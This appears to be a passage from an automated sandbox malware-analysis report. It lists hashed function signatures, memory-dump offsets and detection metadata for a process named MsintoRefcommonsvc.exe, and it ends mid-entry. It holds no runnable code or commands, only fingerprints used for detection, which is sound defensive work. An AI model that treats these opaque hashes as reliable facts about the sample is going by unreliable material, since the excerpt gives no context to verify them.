Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1ed2ffe1f283428ec8fde10915c06e7bcd015646a801313226b74349ca9801
Instruction ID: 8c42a19aef98b639fe5491ea378d675d31928c28f3930094117ed431de0d5003
Opcode Fuzzy Hash: 3d1ed2ffe1f283428ec8fde10915c06e7bcd015646a801313226b74349ca9801
Instruction Fuzzy Hash: 7D110636B0E24D8FE721DFA884601DC7BB1EF42711F0645B3C048DB1A2D574264A87A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA65B6 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f5bb37cc1a698f5faa0f830aa3a51ad1c565245cb0b9e5da6f69e511031b50
Instruction ID: 2411a90a2096bf90ffb28eef2dbf406c92e97af9cbc38fd100e9107bbd828e57
Opcode Fuzzy Hash: 13f5bb37cc1a698f5faa0f830aa3a51ad1c565245cb0b9e5da6f69e511031b50
Instruction Fuzzy Hash: E611A320E0D50E4FEBB8E758D86A6B87392FF49700F1141B9D84DD32F2EE786A414A91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADB356 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9a3a0fad9d063d02d232eee5b23c403fc40163e2854312b0b267dd139bc4c3
Instruction ID: 67f75cd9501ec77ca84237a011eaeb6529c2fa5c7506fc0c301d5f81265f1d47
Opcode Fuzzy Hash: 7f9a3a0fad9d063d02d232eee5b23c403fc40163e2854312b0b267dd139bc4c3
Instruction Fuzzy Hash: 6401B522F1A85E4AE764E79C94A66F873D2FFC4315F850275E41CC75A2CE6879014741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af64785369c322c95d857d43f6f4df44217916251fc380a52d36a7ed7bd3ad4
Instruction ID: 0f146cf45537fcfa793adf1d87d05fd8e3f0d6e76c80f81cc1ea63e2320faf2b
Opcode Fuzzy Hash: 3af64785369c322c95d857d43f6f4df44217916251fc380a52d36a7ed7bd3ad4
Instruction Fuzzy Hash: BB01C436A0E28D8FE721DFA8C4A01DD7FB1EF42711F1645B7D048DB2A2D97426498764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADDA8E Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5f5582b14dfc34bf5c29ff62f6432966f3c7108d4d56ef2fd0e22b0254e122
Instruction ID: 6d8341de2d601726cf8b4a0733a0adedd762c6e48eb1b561ebb8f9721e30529b
Opcode Fuzzy Hash: 8b5f5582b14dfc34bf5c29ff62f6432966f3c7108d4d56ef2fd0e22b0254e122
Instruction Fuzzy Hash: F701BC31F0842D4BEB68D7A888A43FD33E2EFD8715F14C235E009971A4DE79AE468780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804ffaef7b103c31aef2394cc4852c3bd1b2e6bcff2a305eac9b9d494b3c72b9
Instruction ID: 17e40da35f60333fb23485328bb7e31bd29e4a2f88d4d36c69688e1b52fcf999
Opcode Fuzzy Hash: 804ffaef7b103c31aef2394cc4852c3bd1b2e6bcff2a305eac9b9d494b3c72b9
Instruction Fuzzy Hash: 72019235A0E28D9FD721DFA4C8900DCBFB1EF02714F1541E7D048DB2A2D97466458750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56b72fda892fd0132398d44c2f299ca1b5cc0c2004c56f1a44ae262e2ba1031a
Instruction ID: d6e4c235a35327af0d00a832b179b663e2dc12428505b8acbeee51a0764467f0
Opcode Fuzzy Hash: 56b72fda892fd0132398d44c2f299ca1b5cc0c2004c56f1a44ae262e2ba1031a
Instruction Fuzzy Hash: 76018F35E0E28D9FEB21DFA488A00DDBFB1EF02714F1541E7D058DB2A2D9786A458754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA6685 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3845596c4327085e7b812ed148a093c9f00aa9766b84abd82ff29e7f96efc8
Instruction ID: f3017b5c257940a2da8828bcb3b2ada22cc86ee3181a6f653d0a7df30af73cde
Opcode Fuzzy Hash: dd3845596c4327085e7b812ed148a093c9f00aa9766b84abd82ff29e7f96efc8
Instruction Fuzzy Hash: 0A013630A4941E8EEB7CEB54D8696F873A2FF54700F1101BAD44DD31B2DE7C6A818A15

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD7CC5 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3a0e8fae7f0f8ea76c2d76e1108b3071656f99edb871d3569e034e97958dcc
Instruction ID: bc5fe9835513e1729989980b30c67b1055750330ab6fcf9da69b8c8f1d2f4104
Opcode Fuzzy Hash: fd3a0e8fae7f0f8ea76c2d76e1108b3071656f99edb871d3569e034e97958dcc
Instruction Fuzzy Hash: CFF0FC22A0F9C65FE32957649835568BB90BF6260475A01FAC0994B0F7DA5AAD45C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB3C85 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bab0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 425926ff21bf5778283c1e7c111a2949e1e101134debbabab861a4083f15b66c
Instruction ID: 8d62fd00d3c8fd7bd5c37897c8c675d47239bea4d10fe44825ea2e2cfd57703f
Opcode Fuzzy Hash: 425926ff21bf5778283c1e7c111a2949e1e101134debbabab861a4083f15b66c
Instruction Fuzzy Hash: D8F0C871B0555E8BE714AB98C8946FD77E1FB52314F00073AC436C72E5CFF856054640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB38B9 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bab0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86eb42507b6eb1094d652489e2a2730d3b46666edb19dbde7df67bcf4a766cf
Instruction ID: 7325ac8f7e12173e2cee9b15dbb14f0acfda82f22d797b1872a6096bc56f851e
Opcode Fuzzy Hash: c86eb42507b6eb1094d652489e2a2730d3b46666edb19dbde7df67bcf4a766cf
Instruction Fuzzy Hash: 9EF09B7160E3C44FCB16DB7488688557FA0EF6720174A42EFC055CF1A3EA1DD845C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD7C69 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b7cf547e192553f7a63a330707fc305456dc102f628411d2c3a2f81af801a1
Instruction ID: c993d5d17b30db9fc9c63c8f755560c641c30b7960dc69a83b45fa1322703a64
Opcode Fuzzy Hash: 10b7cf547e192553f7a63a330707fc305456dc102f628411d2c3a2f81af801a1
Instruction Fuzzy Hash: 9BE01A2194F7C04FC74B9B3588A98443F70AE6761078A41EAC085CF1B3D9599C49C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB439D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bab0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 815e38644dce26efcebaf115a126d9d21d29ba7f79a8c1d0aefcc60cc11ee5f8
Instruction ID: d8fbabd87f74e76800900410a6b74a4d3e420286b4a2dfcd397669c9c8c0028e
Opcode Fuzzy Hash: 815e38644dce26efcebaf115a126d9d21d29ba7f79a8c1d0aefcc60cc11ee5f8
Instruction Fuzzy Hash: DAE04F3270ED1B46F771A79888605BE7293FBD0311F1A4335D029C21A5DEB8A7064A81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB38D0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bab0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADA410 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADDC49 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c7bc7e04957d0ca628c969f879f495ae07a0835cdc6af11de83afa69c63ec9
Instruction ID: 1be94ba5295fa88d841047d66e180cf21460cc88a6b0e74fe3a99b6c4a590d86
Opcode Fuzzy Hash: b1c7bc7e04957d0ca628c969f879f495ae07a0835cdc6af11de83afa69c63ec9
Instruction Fuzzy Hash: 1AE04626A4A3C04FC70B9B3588A88847F60DE6B21038A40EBC145CF2B3EA29884AC711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADDBC9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba652d45118eacc53d9341baa6351aef66f2a765a7617fd14d5fe522d07b99a
Instruction ID: 281553c8efc8012b3f8d8a51c199f698d05c32285e1a7f3f0798a951c9d9c385
Opcode Fuzzy Hash: 3ba652d45118eacc53d9341baa6351aef66f2a765a7617fd14d5fe522d07b99a
Instruction Fuzzy Hash: D1E04F2554F3C04FC70B973588A88847F60DE6B21034A40EBC145CF2B3E5698C49C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD2509 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7921e9f56f2ba7f5b9361a06f04a1ccc42127fd339bb3871093920f75b85313
Instruction ID: 419a1d033dbc63f47507a148e55350c72ae15a8a2738a0596fed90b69d2bd96a
Opcode Fuzzy Hash: d7921e9f56f2ba7f5b9361a06f04a1ccc42127fd339bb3871093920f75b85313
Instruction Fuzzy Hash: 7FE01A7154E3C08FCB06AB7488699443F709E6721078F41DEC089CF1B3D62E8949CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADA4A0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction ID: d1f90391895e95098fcf59eb18a2def838da6cbe6578d6223bcb966fd047abfb
Opcode Fuzzy Hash: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction Fuzzy Hash: A8D0A73021994E4FC644B778C8594247BA0FB0F210BC510E5E048C7572C54848558704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD4570 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD2520 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADBAB0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddd39a96c55ec30867847dabadf1d4698c514dbc5cbc52b06250146bb9656da2
Instruction ID: 7f00c96b95a1a39f2ae7b01ecb3796dfbf54ba87de82fb5a2f2c66860614d23b
Opcode Fuzzy Hash: ddd39a96c55ec30867847dabadf1d4698c514dbc5cbc52b06250146bb9656da2
Instruction Fuzzy Hash: 79D02234B908040FC71CA73888688303390EBAA20678101A8D00AC72B2D96ADC88C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD4988 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d03eb65ae8bb186dc92644efd7b45e7c81ace32d403a609f1041a8b1e86fb07
Instruction ID: 57b7e3e467d9c6dad222d56a536218f823f9833c51174fbe849c4a0228793f27
Opcode Fuzzy Hash: 2d03eb65ae8bb186dc92644efd7b45e7c81ace32d403a609f1041a8b1e86fb07
Instruction Fuzzy Hash: 4FD01234B519044FC71CA73888598747391EBAA216BD541A9D00AC72B1DA6ADD89CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction ID: c69950b81a92ef1f15f9ade63b0b411c1f11a0f28786b472d33a019d060283e7
Opcode Fuzzy Hash: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction Fuzzy Hash: 8DC00205F5B51E41E43673AA54660ADA2425BD5F14FD70572D50C800A19CDD229A026A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB46EE Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bab0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d4b07931f53e8a926252e6083844231f101afeafb0d21017ceccfbcb05cf65
Instruction ID: 06d9f8c682d214bb0c48a918c15c15b71ec72fa326e7cf14a4dace1f4ce08cf1
Opcode Fuzzy Hash: 67d4b07931f53e8a926252e6083844231f101afeafb0d21017ceccfbcb05cf65
Instruction Fuzzy Hash: 5FD0C730B0991D4BDB58EF589860AA53261EF48344F110474E85DC7167CD74D9124B11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA12B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction ID: ad21155f5929b4340488a01e265f3aca6972bde9f03f1cfbc21dff3670623948
Opcode Fuzzy Hash: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction Fuzzy Hash: 00C08C3051580C8FC948EB29C88880437E0FB09314BC20090E008C7170D259DCC0C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction ID: 8fa141111852f097d445b69c7fd0be198dfd7b7d862507f1d9e476ea019c8cfd
Opcode Fuzzy Hash: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction Fuzzy Hash: 87B01200D5740F00E43433FA08A20AD70425B44300FC20070D40C80091DCCD229D0367

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA25F3 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction ID: 518bd3fd7dcd03cac49325454520f64e380ebd945781a08aba8e8dc240c8e634
Opcode Fuzzy Hash: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9BAA0B46
c9, xrefs: 00007FFD9BAA0B56
!k9, xrefs: 00007FFD9BAA0B4E
#{9, xrefs: 00007FFD9BAA0B3E

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 0407283b7d2cc3fed0501aff7ac6c99f5ee18bf0a9996aa11acc98db60870b86
Instruction ID: 191aa620d6c15ff23ed97f6d5c76e8285049bb97e991ee64ef2b7805c5890ecf
Opcode Fuzzy Hash: 0407283b7d2cc3fed0501aff7ac6c99f5ee18bf0a9996aa11acc98db60870b86
Instruction Fuzzy Hash: E841CC17B0952645E23973FD78219EC6B408FA923FB0847B7F96E8D0C78C082486C2E9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MsintoRefcommonsvc.exePID: 7240, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BAD06AE Relevance: 2.6, Strings: 1, Instructions: 1340COMMON

Download Yara Rule

Strings

!L_H, xrefs: 00007FFD9BAD1AC1

Memory Dump Source

Source File: 00000022.00000002.2123311935.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9bad0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: !L_H
API String ID: 0-91155418
Opcode ID: 7a03cbd2ccd78bc8a2b8a666938ef2c1063818d8e854ca9514515b2e857e7129
Instruction ID: edfec44f28c4c59764f2da3f66e903024109cca70cb9ba3838a5a1d6e93fcab5
Opcode Fuzzy Hash: 7a03cbd2ccd78bc8a2b8a666938ef2c1063818d8e854ca9514515b2e857e7129
Instruction Fuzzy Hash: 6792C531B1990E4FEBA8EB5888A16B87392FFA8350F1546B9D05DC32D7DE74BD818740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD088F Relevance: 2.5, Strings: 1, Instructions: 1272COMMON

Download Yara Rule

Strings

!L_H, xrefs: 00007FFD9BAD1AC1

Memory Dump Source

Source File: 00000022.00000002.2123311935.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9bad0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: !L_H
API String ID: 0-91155418
Opcode ID: 4f61f11c3218b190bc4c95bbc0d4d9a48ec7f7c3e4e38c8dc812f50b1dc0409c
Instruction ID: 9d2d80369c2c984398cdf086ec594d419ef048c041a10b0b2ff71c25f926038d
Opcode Fuzzy Hash: 4f61f11c3218b190bc4c95bbc0d4d9a48ec7f7c3e4e38c8dc812f50b1dc0409c
Instruction Fuzzy Hash: D792A421B1990E4FEBA8EB68C4A57747392FFA8740F0542B9D05DC72E6DE78BD428740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0D48 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FFD9BAC0DF3

Memory Dump Source

Source File: 00000022.00000002.2123311935.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9bac0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
